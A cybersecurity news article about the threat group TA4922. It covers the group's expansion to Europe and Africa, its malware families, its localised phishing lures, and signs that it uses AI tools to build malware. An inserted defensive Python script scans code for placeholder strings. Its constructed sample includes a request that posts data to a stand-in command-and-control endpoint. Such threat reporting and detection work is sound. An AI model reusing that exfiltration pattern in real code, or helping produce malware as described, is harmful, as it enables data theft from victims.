China-linked TA4922 expands attacks to Europe & Africa

Thu, 4th Jun 2026

TA4922, a suspected Chinese-speaking cybercrime group tracked by Proofpoint, has expanded its operations beyond East Asia and is now targeting organisations across Europe and Africa while deploying a growing range of malware families and social engineering tactics.

According to Proofpoint researchers, the actor has significantly increased its operational tempo since March 2026 and is using a wider collection of malware that includes Atlas RAT, RomulusLoader, SilentRunLoader and variants of Winos4.0, also known as ValleyRAT. The group is assessed to be financially motivated and focused on obtaining access to victim environments for purposes such as fraud, data theft, access resale and persistent access.

Global expansion

Proofpoint first observed the group conducting campaigns primarily against organisations in Japan and other parts of Asia, including Taiwan, South Korea, Singapore and India. More recent activity has extended into the United Kingdom, Germany, Italy and South Africa.

The actor relies heavily on localised lures that match regional language and business practices. Messages frequently impersonate human resources departments, finance teams, tax authorities or invoicing services. Campaigns are generally small to medium in size, ranging from several hundred to several thousand targets.

Proofpoint said TA4922 also conducts credential phishing and impersonation campaigns that attempt to move conversations from email into messaging platforms such as LINE, WhatsApp and Microsoft Teams. Once communications shift to those channels, the actor can continue social engineering activity outside traditional email security controls.

Malware growth

The report highlights a substantial increase in the group's malware arsenal during 2026.

Atlas RAT emerged as a new remote access tool used in multiple campaigns targeting organisations in Japan, the United Kingdom and Germany. The malware is delivered through DLL sideloading techniques and supports capabilities including system reconnaissance, file transfers, keylogging, screenshot capture, webcam access and audio recording.

Researchers also identified RomulusLoader, a newly named malware family written in C. The loader downloads and executes additional payloads from command-and-control infrastructure. It uses techniques such as process injection, RC4 encryption, dynamic API resolution and process hollowing to evade detection and maintain persistence.

In several campaigns, RomulusLoader was used to install legitimate remote monitoring and management software including AnyDesk and SyncFuture. Proofpoint noted that cybercriminals increasingly abuse legitimate administrative tools because they can blend into normal network activity.

Another newly identified payload, SilentRunLoader, was observed targeting organisations in the United Kingdom and Southeast Asia. The Python-based malware steals Chrome browser credentials, cookies and browsing data before transmitting the information to attacker-controlled infrastructure.

AI-assisted development

Proofpoint's analysis suggests the group may be using large language models to accelerate malware development.

Researchers identified placeholder values and coding artefacts inside SilentRunLoader, including a hardcoded API key labelled "your_secret_key_here". The company said these characteristics indicate the malware was likely generated or assisted by AI tools.

The report noted that TA4922 appears to be introducing new malware variants at a rapid pace, particularly among Python-based payloads, supporting the assessment that AI-assisted development may be helping the group expand its tooling quickly.
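A triage check for the kind of artefact described above, added here as an example (it is not Proofpoint's tooling or the malware's code). It parses a Python sample with `ast` rather than executing it and flags string constants that look like template placeholders; apart from the reported "your_secret_key_here" value, the patterns and the sample script are constructed assumptions:

```python
import ast
import re

# Placeholder strings typical of template- or LLM-generated code. The first
# pattern covers the exact artefact the report describes ("your_secret_key_here");
# the others are constructed additions, not indicators from the report.
PLACEHOLDER_PATTERNS = [
    re.compile(r"your_[a-z_]*(key|token|secret|password)[a-z_]*", re.I),
    re.compile(r"<(api[_ ]?key|token|secret|password)[^>]*>", re.I),
    re.compile(r"\b(replace|insert|change)[ _](me|this|with)\b", re.I),
    re.compile(r"\bxxx+\b|\bTODO\b|\bCHANGEME\b", re.I),
]


def find_placeholder_artefacts(source: str):
    """Parse Python source without running it and return a sorted list of
    (line_number, string) for every string constant matching a placeholder
    pattern. Unparseable input (obfuscated or non-Python) yields no hits."""
    hits = set()
    try:
        tree = ast.parse(source)
    except SyntaxError:
        return []
    for node in ast.walk(tree):
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            if any(p.search(node.value) for p in PLACEHOLDER_PATTERNS):
                hits.add((node.lineno, node.value))
    return sorted(hits)


# Constructed sample mimicking the reported artefact; this is not the
# malware's code and the endpoint is a labelled placeholder.
SAMPLE = '''
import requests
API_KEY = "your_secret_key_here"
ENDPOINT = "https://[c2-placeholder]/upload"
def send(data):
    return requests.post(ENDPOINT, headers={"X-Key": API_KEY}, json=data)
'''

if __name__ == "__main__":
    for line, value in find_placeholder_artefacts(SAMPLE):
        print(f"line {line}: placeholder string {value!r}")
```

A hit on its own is only a triage signal; it indicates code that was never finalised, not attribution to any particular toolchain.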

Regional targeting

Despite the broader geographic reach, Proofpoint said the actor remains disciplined in tailoring campaigns to local audiences.

Tax audit notices were used against German organisations. Payroll notifications targeted companies in Germany and Japan. Benefits and compliance-themed messages were directed at organisations across Southeast Asia and the United Kingdom. Invoicing and customer service themes also appeared in several campaigns.

The report concludes that TA4922 is conducting more unique campaigns than any other cybercrime actor currently tracked within Proofpoint's threat intelligence data. Researchers said the group combines targeted social engineering, multiple malware families, legitimate software and cloud-hosted infrastructure to increase effectiveness while complicating detection efforts.

"TA4922 currently conducts more unique campaigns than any other tracked cybercrime threat actor in Proofpoint threat data, demonstrating high operational tempo, a variety of lures, and multiple objectives," said the Proofpoint Threat Research Team.